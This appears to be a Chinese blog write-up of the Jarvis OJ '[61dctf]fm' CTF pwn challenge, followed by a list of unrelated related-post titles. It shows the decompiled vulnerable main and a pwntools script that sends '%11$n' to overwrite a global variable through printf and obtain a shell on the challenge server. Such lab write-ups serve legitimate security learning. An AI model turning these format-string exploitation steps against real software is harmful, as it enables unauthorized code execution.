[61dctf]fm

附件地址 : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399

nc pwn2.jarvisoj.com 9895

checksec Canary found栈溢出行不通

main函数

在if判断了x的值,但是x的值是我们不可控制的,printf输出了&buf的值,这里是可以进行格式化字符串攻击的,而且if判断的是4 而$n可以输出4的int值到任意的地址中。

int __cdecl main(int argc, const char **argv, const char **envp)
{char buf; // [esp+2Ch] [ebp-5Ch]unsigned int v5; // [esp+7Ch] [ebp-Ch]v5 = __readgsdword(0x14u);be_nice_to_people();memset(&buf, 0, 0x50u);read(0, &buf, 0x50u);printf(&buf);printf("%d!\n", x);if ( x == 4 ){puts("running sh...");system("/bin/sh");}return 0;
}

可以看到输出aaaa的偏移量的11

通过动态调试,把x的值设置为0x4,运行后确实得到shell

exp

from pwn import *io = process("./stack")
io = remote("pwn2.jarvisoj.com", 9895)
x_addr = 0x0804A02C
context(log_level="debug", arch="i386")payload = flat([x_addr,'%11$n'])io.sendline(payload)
io.interactive()

[61dctf]fm相关推荐

  1. [Jarvis OJ - PWN]——[61dctf]fm

    [Jarvis OJ - PWN]--[61dctf]fm 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下, 开启了canary ...

  2. 源码推荐:collectionView拖拽,仿凤凰FM iOS 局部监听键盘再也不会挡住输入框

    UICollectionView拖拽移动单元以及本地保存(上传者:dengqi) UICollectionView拖拽移动单元以及本地保存,可以保存你上次移动的位置. 仿映客直播导航条(上传者:Coo ...

  3. 摆脱 FM!这些推荐系统模型真香

    ‍‍ 作者 | 梁唐 来源 | TechFlow 之前我们介绍了推荐当中应用得非常广泛的FM大家族,从FM这个模型衍生出了一系列的模型,从纯FM,到AFM.FFM.DeepFM等等一系列的FM模型,最 ...

  4. 推荐系统召回四模型之全能的FM模型

    作者 | 张俊林 作者简介:中国中文信息学会理事,中科院软件所博士.目前在新浪微博 AI Lab 担任资深算法专家.在此之前,张俊林曾经在阿里巴巴任资深技术专家并负责新技术团队,以及在百度和用友担任技 ...

  5. 聚类效果评估、内部指标(Jaccard系数、FM指数、Rand指数)、外部指标(DB指数、Dunn指数)、轮廓系数(Silhouette Coefficient)

    聚类效果评估.内部指标(Jaccard系数.FM指数.Rand指数).外部指标(DB指数.Dunn指数).轮廓系数(Silhouette Coefficient) 目录

  6. mf模型 svd++_算法小板报(六)——初探MF(矩阵分解)和FM模型

    一.简介 矩阵分解(Matrix Factorization,MF)是推荐系统中非常经典的一个算法,虽然现今工业界直接使用的较少,但其背后蕴含的编码降维思想,得以广泛应用于推荐领域之中.本文则主要来梳 ...

  7. SAP ABAP FM AC_DOCUMENT_RECORD 研习

    SAP ABAP FM AC_DOCUMENT_RECORD 研习 如下物料凭证号4904373511/2018,对应的财务凭证号32000006184如下: 如何从ABAP的角度用某个functio ...

  8. 荔枝FM 字体文件 IconFontTextView

    使用效果 <?xml version="1.0" encoding="utf-8"?> <LinearLayoutxmlns:android= ...

  9. Android FM模块学习之一 FM启动流程

    转自:http://blog.csdn.net/tfslovexizi/article/details/41283743 最近在学习FM模块,FM是一个值得学习的模块,可以从上层看到底层.上层就是FM ...

最新文章

  1. 海康威视连续采图设置ROI局部显示_c#
  2. serv-u 自定义html,Serv-U架设教程_Serv-U使用教程图文版
  3. 【Netty】NIO 通道 ( Channel ) 组件
  4. oc中代理的简单运用
  5. 扫描仪图标无法显示计算机,win7“我的电脑”中不显示扫描仪和摄像头的原因和解决方法...
  6. 深入浅出让你理解什么是LLVM
  7. 2015 SegmentFault 黑客马拉松记录
  8. js中双感叹号_JavaScript中双叹号(!!)作用
  9. Linux 进程通信
  10. 小学生数学测试软件论文,测试数学论文,关于小学生数学基本能力测试量表的贵族常模制订相关参考文献资料-免费论文范文...
  11. html磁贴模板,文本磁贴模板(列表文件夹)(HTML)
  12. Unity导出exe时遇到的两个问题
  13. python开发网页视频播放器_python实现媒体播放器功能
  14. layer.open(常用)
  15. C++ 中 _T 含义及用途
  16. 大家都在找那个过滤呜呜祖拉的软件
  17. 360权重 360网站权重查询在哪里
  18. HTML CSS xmind总结
  19. CSS高级属性之 box-shadow 详解
  20. 面向对象的三个基本特征和五种设计原则

热门文章

  1. 空间说说html,qq空间说说带图片 唯美心情说说
  2. 那些治愈者会再一次感染新冠病毒吗?
  3. 跟我学Springboot开发后端管理系统8:AOP+logback+MDC日志输出
  4. mssql数据库的备份与还原
  5. access的一些基本操作
  6. KAFKA-PHP环境搭建
  7. poi-tl生成表单并转成pdf(Linux服务器)
  8. 1584 ZJOI2008 骑士
  9. 安卓-获取手机定位数据
  10. 数值计算方法之数值积分与微分